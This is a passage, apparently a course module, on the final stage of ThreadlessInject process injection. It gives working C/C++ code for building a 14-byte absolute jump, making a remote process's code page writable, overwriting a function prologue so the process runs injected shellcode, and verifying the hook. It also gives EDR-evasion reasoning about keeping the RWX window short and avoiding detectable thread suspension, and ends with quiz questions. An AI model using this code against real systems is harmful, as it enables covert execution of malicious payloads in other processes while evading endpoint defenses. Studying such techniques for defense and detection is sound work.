Module 6: Installing the Remote Hook
The moment of truth: overwriting the target function's prologue to redirect execution.
The Final Step Before Execution
At this point, the shellcode and hook stub are sitting in executable memory inside the target process, waiting to be called. The only remaining step is to overwrite the first 14 bytes of the target function with a JMP instruction that redirects to our hook stub. This is the most delicate operation in the entire chain because it modifies executable code in a running process. If another thread is executing those bytes at the moment they are overwritten, that thread can decode a mix of old and new bytes and crash the process.
Constructing the Hook Jump
The hook is a 14-byte absolute jump that redirects execution from the target function's entry point to the hook stub in our allocated memory region:
// Build the 14-byte absolute JMP that will overwrite the function prologue
BYTE hookJmp[14];
// JMP [RIP+0] - opcode FF 25, with 00000000 as RIP-relative offset
hookJmp[0] = 0xFF;
hookJmp[1] = 0x25;
*(DWORD*)(hookJmp + 2) = 0x00000000; // Offset 0: address follows immediately
// The 8-byte absolute address of our hook stub in the remote process
*(UINT64*)(hookJmp + 6) = (UINT64)remoteHookStubAddr;
// hookJmp now contains:
// FF 25 00 00 00 00 [8 bytes: address of hook stub]
// When executed, the CPU reads the 8 bytes after the JMP instruction
// and loads them into RIP, transferring control to our hook stub
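The byte layout described above can be checked in isolation, without touching any process. The following is a minimal sketch in portable C++. The names `buildAbsoluteJmp` and `decodeAbsoluteJmp` are hypothetical helpers introduced here for illustration and are not taken from ThreadlessInject. The address is written byte by byte in little-endian order, which sidesteps the unaligned pointer casts used in the snippet above.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>

// Size of the FF 25 00 00 00 00 <imm64> sequence.
constexpr std::size_t kAbsJmpSize = 14;

// Encode JMP [RIP+0] followed by the 64-bit target in little-endian order.
// (Hypothetical helper name, for illustration only.)
std::array<std::uint8_t, kAbsJmpSize> buildAbsoluteJmp(std::uint64_t target) {
    std::array<std::uint8_t, kAbsJmpSize> out{};  // zero-filled, so the disp32 at [2..5] is 0
    out[0] = 0xFF;                                // opcode byte
    out[1] = 0x25;                                // ModRM: RIP-relative indirect jump
    for (std::size_t i = 0; i < 8; ++i) {
        out[6 + i] = static_cast<std::uint8_t>(target >> (8 * i));
    }
    return out;
}

// Decode the buffer back into its target, or return nullopt if the
// opcode or the zero displacement does not match the expected layout.
std::optional<std::uint64_t> decodeAbsoluteJmp(
        const std::array<std::uint8_t, kAbsJmpSize>& bytes) {
    if (bytes[0] != 0xFF || bytes[1] != 0x25) return std::nullopt;
    for (std::size_t i = 2; i < 6; ++i) {
        if (bytes[i] != 0x00) return std::nullopt;
    }
    std::uint64_t target = 0;
    for (std::size_t i = 0; i < 8; ++i) {
        target |= static_cast<std::uint64_t>(bytes[6 + i]) << (8 * i);
    }
    return target;
}
```

Round-tripping an address through both functions is a cheap way to confirm that the offsets (2 for the displacement, 6 for the address) are right before the buffer is used anywhere else.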
Making the Target Function Writable
Code pages in a running process are typically mapped as PAGE_EXECUTE_READ (RX). You cannot write to them without first changing the page protection. This requires NtProtectVirtualMemory on the remote process:
// Step 1: Temporarily change the protection of the page(s) holding the prologue to RWX
PVOID protectAddr = (PVOID)hookedFuncAddr;
SIZE_T protectSize = 14; // We only need to write 14 bytes
ULONG oldProtect = 0;
// Note: protectAddr and protectSize are in/out parameters. On return they hold
// the page-aligned base and size of the region whose protection was changed.
NTSTATUS status = NtProtectVirtualMemory(
    hProcess,
    &protectAddr,
    &protectSize,
    PAGE_EXECUTE_READWRITE, // Temporarily make writable + executable
    &oldProtect             // Receives the old protection (should be PAGE_EXECUTE_READ)
);
if (!NT_SUCCESS(status)) {
    return FALSE; // Protection change failed; nothing has been modified
}
// Step 2: Write the 14-byte hook JMP over the function prologue
SIZE_T written = 0;
NtWriteVirtualMemory(
    hProcess,
    (PVOID)hookedFuncAddr, // Destination: start of target function
    hookJmp,               // Source: our 14-byte JMP
    14,                    // Size: exactly 14 bytes
    &written
);
// Step 3: Restore original page protection
// protectAddr/protectSize now describe the page-aligned region from Step 1
NtProtectVirtualMemory(
    hProcess,
    &protectAddr,
    &protectSize,
    oldProtect, // Restore to original protection (RX)
    &oldProtect
);
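The protection call works on whole pages, so a 14-byte request is widened to the page or pages that contain it. The sketch below illustrates that rounding, assuming 4 KiB pages. `pageSpan` is a hypothetical helper written for this illustration. The rounding rule follows the documented behavior of VirtualProtect, which changes every page containing at least one byte of the requested range.

```cpp
#include <cassert>
#include <cstdint>

// Page-aligned region that covers [addr, addr + len).
struct PageSpan {
    std::uint64_t base;  // start of the first affected page
    std::uint64_t size;  // total size of all affected pages
};

// Hypothetical helper: compute which pages a protection change would touch.
// pageSize defaults to 4096, which is an assumption about the target system.
PageSpan pageSpan(std::uint64_t addr, std::uint64_t len,
                  std::uint64_t pageSize = 4096) {
    assert(pageSize != 0 && (pageSize & (pageSize - 1)) == 0);  // power of two
    assert(len != 0);
    const std::uint64_t mask = pageSize - 1;
    const std::uint64_t base = addr & ~mask;               // round start down
    const std::uint64_t end  = (addr + len + mask) & ~mask; // round end up
    return PageSpan{base, end - base};
}
```

For a prologue at offset 0x10 in its page, the span is a single page. For one that starts 8 bytes before a page boundary, the same 14 bytes straddle two pages, so both pages are briefly writable and executable.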
The RWX Window
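Notice that for a brief moment, the page (or pages) containing the target function's prologue has PAGE_EXECUTE_READWRITE protection. This is a transient state: the protection is changed, the 14 bytes are written, and the protection is immediately restored. The change applies to whole pages, not just the 14 bytes being written. A memory scanner that samples the page at exactly the right moment could detect the temporary RWX state, but in practice the window is typically microseconds long. The protection-change calls themselves remain observable to anything that monitors them, however short the window is. ThreadlessInject minimizes the window by performing the write immediately after the protection change.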
Thread Safety During Hook Installation
The most dangerous race condition in any hooking technique is the moment of overwriting the target bytes. If a thread in the target process is executing the function at the exact instruction that you are overwriting, the thread will execute a partially-overwritten instruction and crash. Consider what happens step by step:
[Figure: Race Condition: Partial Hook Write]
There are several strategies to mitigate this risk:
Strategy 1: Atomic 8-Byte Writes
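On x86-64 processors, naturally aligned 8-byte writes are atomic with respect to other memory accesses. Our 14-byte hook exceeds this limit, so it cannot be written in a single atomic store. There is a way around this: if the hook stub (or a trampoline) lies within ±2 GB of the target, a 5-byte relative JMP (E9 xx xx xx xx) is enough. The 5 bytes can be padded to 8 and, provided the function entry is 8-byte aligned, written with a single interlocked operation. This removes the torn-write case, but it does not help a thread that is already partway through the first 8 bytes, because the padding still replaces original instruction bytes.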
// Atomic write strategy using InterlockedCompareExchange64
// This only works if your detour is within +/- 2GB (relative JMP range),
// the patch fits in 8 bytes, and hookedFuncAddr is 8-byte aligned
// Build an 8-byte patch: 5-byte relative JMP + 3 bytes of NOPs
BYTE patch[8] = {0};
INT32 relOffset = (INT32)((INT64)hookStubAddr - (INT64)(hookedFuncAddr + 5));
patch[0] = 0xE9;                  // JMP rel32
*(INT32*)(patch + 1) = relOffset; // 32-bit relative offset
patch[5] = 0x90; patch[6] = 0x90; patch[7] = 0x90; // NOP padding
// Atomic 8-byte write (in-process example; remote requires different approach)
// Read the expected value once so the comparison and the result check agree
LONG64 expected = *(volatile LONG64*)hookedFuncAddr;
LONG64 previous = InterlockedCompareExchange64(
    (volatile LONG64*)hookedFuncAddr,
    *(LONG64*)patch, // New value (our JMP + NOPs)
    expected         // Expected current value
);
// The exchange took place only if previous == expected
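Both preconditions of the atomic strategy, the ±2 GB reach of a relative JMP and the 8-byte alignment of the patch site, are plain arithmetic and can be checked before any bytes are built. The sketch below is one way to do that in portable C++. `rel32Displacement` and `isQwordAligned` are hypothetical names used only for illustration. Unlike the cast in the snippet above, the displacement helper reports an out-of-range target instead of silently truncating it.

```cpp
#include <cstdint>
#include <optional>

// Length of an E9 rel32 jump. The displacement is measured from the
// address of the instruction that follows the jump.
constexpr std::uint64_t kRelJmpSize = 5;

// Return the rel32 displacement for a JMP placed at `from` that should land
// on `to`, or nullopt if the target is outside the signed 32-bit range.
std::optional<std::int32_t> rel32Displacement(std::uint64_t from,
                                              std::uint64_t to) {
    const std::uint64_t next = from + kRelJmpSize;
    if (to >= next) {
        const std::uint64_t forward = to - next;
        if (forward > 0x7FFFFFFFull) return std::nullopt;   // beyond +2 GB
        return static_cast<std::int32_t>(forward);
    }
    const std::uint64_t backward = next - to;
    if (backward > 0x80000000ull) return std::nullopt;      // beyond -2 GB
    return static_cast<std::int32_t>(-static_cast<std::int64_t>(backward));
}

// An 8-byte store is only atomic when it is naturally aligned.
bool isQwordAligned(std::uint64_t addr) {
    return (addr & 0x7ull) == 0;
}
```

If either check fails, the 8-byte approach does not apply and the 14-byte absolute form is the remaining option described in this module.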
ThreadlessInject's Approach
In practice, ThreadlessInject uses the simpler NtWriteVirtualMemory approach for the full 14-byte overwrite. The rationale is that thread safety concerns are mitigated by choosing a target function that is not being actively executed at the moment of hook installation. If the function is one that threads call periodically (like a sleep or wait function), there is typically a window between calls where no thread is executing the prologue. The risk is accepted as low for well-chosen targets.
Strategy 2: Suspend/Resume Target Threads
A more robust (but noisier) approach is to suspend all threads in the target process before installing the hook, then resume them after:
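// Suspend all threads in target process before hook installation
// WARNING: This is detectable and can cause deadlocks
// Requires <windows.h>, <tlhelp32.h>, and <vector>
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
THREADENTRY32 te32;
te32.dwSize = sizeof(THREADENTRY32);
std::vector<HANDLE> threads;
if (hSnap != INVALID_HANDLE_VALUE && Thread32First(hSnap, &te32)) {
    do {
        if (te32.th32OwnerProcessID == targetPid) {
            HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te32.th32ThreadID);
            if (hThread) {
                SuspendThread(hThread);
                threads.push_back(hThread);
            }
        }
    } while (Thread32Next(hSnap, &te32));
}
if (hSnap != INVALID_HANDLE_VALUE) {
    CloseHandle(hSnap); // The snapshot is no longer needed once enumeration is done
}
// Install the hook. No thread can run during the write, although a thread
// that was suspended inside the prologue itself would still need handling.
// InstallHookJmp stands for the protect/write/restore sequence shown earlier.
InstallHookJmp(hProcess, hookedFuncAddr, hookJmp);
// Resume all threads
for (HANDLE h : threads) {
    ResumeThread(h);
    CloseHandle(h);
}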
However, suspending threads is itself detectable (EDRs monitor SuspendThread calls targeting other processes) and can cause deadlocks if a suspended thread holds a lock that other code needs. ThreadlessInject avoids this approach in favor of the simpler non-atomic write with careful target selection.
Verifying Hook Installation
After writing the hook, a prudent implementation verifies that the write succeeded by reading back the bytes:
// Verify the hook was installed correctly
BYTE verification[14] = {0};
NtReadVirtualMemory(hProcess, (PVOID)hookedFuncAddr, verification, 14, NULL);
// Compare with expected hook bytes
if (memcmp(verification, hookJmp, 14) != 0) {
// Hook installation failed - another thread may have modified the bytes
// or an EDR may have blocked the write
printf("[-] Hook verification failed!\n");
// Cleanup: free remote memory, close handles
return FALSE;
}
printf("[+] Hook installed successfully at 0x%p\n", (void*)hookedFuncAddr);
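A plain memcmp only says that the buffers differ. When verification fails, knowing which byte differs helps tell a truncated write from bytes that were changed by something else. The following is a small sketch of such a comparison in portable C++. `firstMismatch` is a hypothetical helper for illustration and operates on local copies of the expected and read-back bytes.

```cpp
#include <algorithm>
#include <cstddef>
#include <cstdint>
#include <optional>
#include <vector>

// Return the index of the first byte where `actual` differs from `expected`,
// or nullopt if the two buffers are identical. A length difference counts as
// a mismatch at the end of the shorter buffer.
std::optional<std::size_t> firstMismatch(
        const std::vector<std::uint8_t>& expected,
        const std::vector<std::uint8_t>& actual) {
    const std::size_t common = std::min(expected.size(), actual.size());
    const auto expectedEnd =
        expected.begin() + static_cast<std::ptrdiff_t>(common);
    const auto pos =
        std::mismatch(expected.begin(), expectedEnd, actual.begin()).first;
    if (pos != expectedEnd) {
        return static_cast<std::size_t>(pos - expected.begin());
    }
    if (expected.size() != actual.size()) {
        return common;
    }
    return std::nullopt;
}
```

A mismatch at index 0 suggests the write never landed, while a mismatch in the middle of the buffer suggests a partial write or a concurrent modification.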
The Complete Installation Sequence
Putting it all together, here is the full sequence of operations for hook installation:
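[Figure: Hook Installation Timeline. Build the 14-byte JMP, change the page protection to RWX, write the 14 bytes, restore the original protection, then read the bytes back to verify.]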
What Happens Next
At this point, the hook is installed. The target function's first 14 bytes are now a JMP to your hook stub. The next time any thread in the target process calls that function, execution will transfer to the hook stub, which will save registers, call the shellcode, restore registers, execute the original prologue bytes, and jump back to the function. From the injector's perspective, the job is done: you can close the process handle and exit. The shellcode will execute asynchronously whenever a target thread calls the hooked function.
Pop Quiz: Installing the Remote Hook
Q1: Why must you change the target function's page protection before writing the hook?
Q2: Why does ThreadlessInject avoid suspending all threads before hook installation?
Q3: What is the advantage of a 5-byte relative JMP (E9) over the 14-byte absolute JMP (FF 25)?